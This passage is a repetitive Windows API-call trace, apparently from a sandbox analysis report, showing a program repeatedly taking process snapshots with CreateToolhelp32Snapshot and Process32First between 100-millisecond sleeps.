(dwMilliseconds=0x64) [0129.690] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0129.712] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.781] Sleep (dwMilliseconds=0x64) [0129.881] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0129.907] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.997] Sleep (dwMilliseconds=0x64) [0130.097] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0130.110] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.225] Sleep (dwMilliseconds=0x64) [0130.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0130.351] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.442] Sleep (dwMilliseconds=0x64) [0130.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0130.564] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.742] Sleep (dwMilliseconds=0x64) [0130.847] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0130.870] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.991] Sleep (dwMilliseconds=0x64) [0131.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0131.103] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.181] Sleep (dwMilliseconds=0x64) [0131.282] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0131.299] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.405] Sleep (dwMilliseconds=0x64) [0131.507] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0131.522] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.631] Sleep (dwMilliseconds=0x64) [0131.732] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0131.746] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0131.855] Sleep (dwMilliseconds=0x64) [0131.990] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d34 [0132.005] Process32First (in: hSnapshot=0x1d34, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.149] Sleep (dwMilliseconds=0x64) [0132.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ad4 [0132.264] Process32First (in: hSnapshot=0x1ad4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.333] Sleep (dwMilliseconds=0x64) [0132.434] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ad4 [0132.446] Process32First (in: hSnapshot=0x1ad4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.532] Sleep (dwMilliseconds=0x64) [0132.641] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fe4 [0132.656] Process32First (in: hSnapshot=0x1fe4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.797] Sleep (dwMilliseconds=0x64) [0132.898] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c4 [0132.912] Process32First (in: hSnapshot=0x19c4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.039] Sleep (dwMilliseconds=0x64) [0133.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d3c [0133.217] Process32First (in: hSnapshot=0x1d3c, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.330] Sleep (dwMilliseconds=0x64) [0133.434] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19e8 [0133.447] Process32First (in: hSnapshot=0x19e8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.526] Sleep (dwMilliseconds=0x64) [0133.627] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19e8 [0133.710] Process32First (in: hSnapshot=0x19e8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.781] Sleep (dwMilliseconds=0x64) [0133.881] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ad4 [0133.893] Process32First (in: hSnapshot=0x1ad4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.000] Sleep (dwMilliseconds=0x64) [0134.100] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ad4 [0134.116] Process32First (in: hSnapshot=0x1ad4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.278] Sleep (dwMilliseconds=0x64) [0134.413] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19c4 [0134.431] Process32First (in: hSnapshot=0x19c4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.545] Sleep (dwMilliseconds=0x64) [0134.650] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19f4 [0134.664] Process32First (in: hSnapshot=0x19f4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.772] Sleep (dwMilliseconds=0x64) [0134.873] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19f4 [0134.884] Process32First (in: hSnapshot=0x19f4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.958] Sleep (dwMilliseconds=0x64) [0135.487] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19f4 [0135.505] Process32First (in: hSnapshot=0x19f4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.635] Sleep (dwMilliseconds=0x64) [0135.736] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0135.751] Process32First (in: hSnapshot=0x1d14, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0135.846] Sleep (dwMilliseconds=0x64) [0135.947] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0135.964] Process32First (in: hSnapshot=0x1d14, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.079] Sleep (dwMilliseconds=0x64) [0136.222] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a0 [0136.240] Process32First (in: hSnapshot=0x23a0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.361] Sleep (dwMilliseconds=0x64) [0136.466] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a0 [0136.481] Process32First (in: hSnapshot=0x23a0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.586] Sleep (dwMilliseconds=0x64) [0136.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a0 [0136.733] Process32First (in: hSnapshot=0x23a0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0136.874] Sleep (dwMilliseconds=0x64) [0136.981] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x23a0 [0137.002] Process32First (in: hSnapshot=0x23a0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.145] Sleep (dwMilliseconds=0x64) [0137.253] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a88 [0137.267] Process32First (in: hSnapshot=0x1a88, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.373] Sleep (dwMilliseconds=0x64) [0139.084] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a88 [0139.207] Process32First (in: hSnapshot=0x1a88, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.279] Sleep (dwMilliseconds=0x64) [0143.149] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0143.168] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.510] Sleep (dwMilliseconds=0x64) [0143.680] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0143.932] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.373] Sleep (dwMilliseconds=0x64) [0144.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0144.537] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.276] Sleep (dwMilliseconds=0x64) [0145.485] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0145.501] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.637] Sleep (dwMilliseconds=0x64) [0145.769] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0145.789] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.866] Sleep (dwMilliseconds=0x64) [0145.987] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0145.998] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.683] Sleep (dwMilliseconds=0x64) [0146.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0146.995] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.123] Sleep (dwMilliseconds=0x64) [0147.255] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0147.269] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.399] Sleep (dwMilliseconds=0x64) [0147.548] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0147.560] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.786] Sleep (dwMilliseconds=0x64) [0147.920] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0147.933] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.229] Sleep (dwMilliseconds=0x64) [0148.376] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0148.391] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.560] Sleep (dwMilliseconds=0x64) [0148.682] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0148.694] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.889] Sleep (dwMilliseconds=0x64) [0148.995] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0149.044] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.206] Sleep (dwMilliseconds=0x64) [0149.329] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0149.346] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.489] Sleep (dwMilliseconds=0x64) [0149.623] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0149.642] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.809] Sleep (dwMilliseconds=0x64) [0149.928] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0149.943] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.105] Sleep (dwMilliseconds=0x64) [0150.224] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0150.237] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.394] Sleep (dwMilliseconds=0x64) [0150.521] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0150.535] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.693] Sleep (dwMilliseconds=0x64) [0150.859] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0150.872] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.124] Sleep (dwMilliseconds=0x64) [0151.258] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0151.274] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.419] Sleep (dwMilliseconds=0x64) [0151.563] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0151.574] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.754] Sleep (dwMilliseconds=0x64) [0151.899] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0151.914] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.096] Sleep (dwMilliseconds=0x64) [0152.216] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0152.229] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.383] Sleep (dwMilliseconds=0x64) [0152.484] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0152.498] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.579] Sleep (dwMilliseconds=0x64) [0152.681] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0152.701] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.849] Sleep (dwMilliseconds=0x64) [0152.954] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0153.035] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.187] Sleep (dwMilliseconds=0x64) [0153.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d90 [0153.310] Process32First (in: hSnapshot=0x1d90, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.466] Sleep (dwMilliseconds=0x64) [0153.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 